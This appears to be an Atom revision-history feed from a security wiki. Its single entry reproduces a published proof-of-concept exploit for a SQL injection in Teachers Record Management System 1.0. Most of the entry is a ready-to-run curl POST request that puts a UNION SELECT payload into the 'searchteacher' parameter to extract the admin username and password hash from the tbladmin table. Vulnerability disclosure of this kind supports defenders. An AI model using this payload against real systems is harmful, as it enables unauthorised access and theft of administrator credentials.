<?xml version="1.0"?>
<feed xmlns="http://www.w3.org/2005/Atom" xml:lang="chinese">
	<id>https://pwnwiki.com/index.php?action=history&amp;feed=atom&amp;title=Teachers_Record_Management_System_1.0_SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E</id>
	<title>Teachers Record Management System 1.0 SQL注入漏洞 - Revision history</title>
	<link rel="self" type="application/atom+xml" href="https://pwnwiki.com/index.php?action=history&amp;feed=atom&amp;title=Teachers_Record_Management_System_1.0_SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E"/>
	<link rel="alternate" type="text/html" href="https://pwnwiki.com/index.php?title=Teachers_Record_Management_System_1.0_SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E&amp;action=history"/>
	<updated>2026-04-20T23:36:05Z</updated>
	<subtitle>Revision history for this page on the wiki</subtitle>
	<generator>MediaWiki 1.35.1</generator>
	<entry>
		<id>https://pwnwiki.com/index.php?title=Teachers_Record_Management_System_1.0_SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E&amp;diff=1260&amp;oldid=prev</id>
		<title>Pwnwiki: Created page with &quot;==EXP== &lt;pre&gt; # Exploit Title: Teachers Record Management System 1.0 - 'searchteacher' SQL Injection # Date: 13/02/2021 # Exploit Author: Soham Bakore, Nakul Ratti # Vendor Ho...&quot;</title>
		<link rel="alternate" type="text/html" href="https://pwnwiki.com/index.php?title=Teachers_Record_Management_System_1.0_SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E&amp;diff=1260&amp;oldid=prev"/>
		<updated>2021-04-08T09:22:37Z</updated>

		<summary type="html">&lt;p&gt;Created page with &amp;quot;==EXP== &amp;lt;pre&amp;gt; # Exploit Title: Teachers Record Management System 1.0 - &amp;#039;searchteacher&amp;#039; SQL Injection # Date: 13/02/2021 # Exploit Author: Soham Bakore, Nakul Ratti # Vendor Ho...&amp;quot;&lt;/p&gt;
&lt;p&gt;&lt;b&gt;New page&lt;/b&gt;&lt;/p&gt;&lt;div&gt;==EXP==&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
# Exploit Title: Teachers Record Management System 1.0 - 'searchteacher' SQL Injection&lt;br /&gt;
# Date: 13/02/2021&lt;br /&gt;
# Exploit Author: Soham Bakore, Nakul Ratti&lt;br /&gt;
# Vendor Homepage: https://www.sourcecodester.com/&lt;br /&gt;
# Software Link: https://www.sourcecodester.com/php/14399/teacher-record-system-phpmysql.html&lt;br /&gt;
# Version:1.0&lt;br /&gt;
# Tested on: latest version of Chrome, Firefox on Windows and Linux&lt;br /&gt;
&lt;br /&gt;
--------------------------Proof of Concept-----------------------&lt;br /&gt;
&lt;br /&gt;
1. Navigate to http://host/trms/&lt;br /&gt;
2. The &amp;quot;searchteacher&amp;quot; parameter in search-teacher.php is vulnerable to SQL&lt;br /&gt;
injection&lt;br /&gt;
3. Below curl request will display the admin username and password hash&lt;br /&gt;
&lt;br /&gt;
------------------------Exploit request-----------------------------&lt;br /&gt;
&lt;br /&gt;
curl -i -s -k -X $'POST' \&lt;br /&gt;
    -H $'Host: 192.168.1.13' -H $'User-Agent: Mozilla/5.0 (Windows NT 10.0;&lt;br /&gt;
Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0' -H $'Accept:&lt;br /&gt;
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8'&lt;br /&gt;
-H $'Accept-Language: en-US,en;q=0.5' -H $'Accept-Encoding: gzip, deflate'&lt;br /&gt;
-H $'Content-Type: application/x-www-form-urlencoded' -H $'Content-Length:&lt;br /&gt;
130' -H $'Origin: http://192.168.1.17' -H $'DNT: 1' -H $'Connection: close'&lt;br /&gt;
-H $'Referer: http://192.168.1.13/trms/' -H $'Cookie:&lt;br /&gt;
PHPSESSID=t2lshgnjhov62o1s0q0iq331p9' -H $'Upgrade-Insecure-Requests: 1' \&lt;br /&gt;
    -b $'PHPSESSID=t2lshgnjhov62o1s0q0iq331p9' \&lt;br /&gt;
    --data-binary&lt;br /&gt;
$'searchteacher=Arts\'+union+select+1,concat(\'Username:\',UserName),3,concat(\'Password:\',Password),5,6,7,8,9,10+from+tbladmin#&amp;amp;search='&lt;br /&gt;
\&lt;br /&gt;
    $'http://host/trms/search-teacher.php'&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;/div&gt;</summary>
		<author><name>Pwnwiki</name></author>
	</entry>
</feed>